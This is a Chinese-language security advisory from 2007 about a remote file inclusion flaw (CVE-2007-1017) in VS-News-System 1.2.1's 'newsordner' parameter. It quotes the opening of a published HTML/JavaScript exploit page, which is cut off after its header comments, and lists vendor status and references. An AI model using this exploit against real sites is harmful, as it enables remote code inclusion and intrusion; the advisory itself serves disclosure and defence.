发布日期：2007-02-16
更新日期：2007-02-16

受影响系统：

VirtualSystem VS-News-System 1.2.1

描述：

---

BUGTRAQ  ID: 22592
CVE(CAN) ID: CVE-2007-1017

VS-News-System是网络管理工具。

VS-News-System 1.2.1没有正确验证show_news_inc.php及tpl/header.php内的"newsordner"参数值，及用于包含文件，可导致包含内部或外部资源内的任意文件。要利用此漏洞需要启用"register_globals"。

<*来源：ajann （ajannhwt@hotmail.com）
  
  链接：http://secunia.com/advisories/24220
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>VS-News-System <= V1.2.1 (newsordner) Remote File Include Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: VS-News-System <= V1.2.1 (newsordner) Remote File Include Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[S.Page : http://www.virtualsystem.de/ //'[$$ : Free //'[Using : Write Target after Submit Click //'=============================================================================================== //'[[ERROR]]]------------------------------------------------------ //'.... //'.. //'<? //' //'include ($gb_pfad ."/language/german.php"); //' //'?> //'.... //'.. //'[[ERROR]]]--------------------------------------------------------- //# ajann,Turkey //# ... //Basic exploit,but any time : ( var path="/"

建议：

---

厂商补丁：

VirtualSystem
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&user_sort_top=&down_id=14&seite=0

参考：
MILW0RM:3322
URL:http://www.milw0rm.com/exploits/3322
BID:22592
URL:http://www.securityfocus.com/bid/22592
VUPEN:ADV-2007-0649
URL:http://www.vupen.com/english/advisories/2007/0649
OSVDB:33247
URL:http://osvdb.org/33247
SECUNIA:24220
URL:http://secunia.com/advisories/24220
XF:vsnewssystem-shownewsinc-file-include(32544)
URL:http://xforce.iss.net/xforce/xfdb/32544

浏览次数：1760
严重程度：0（网友投票）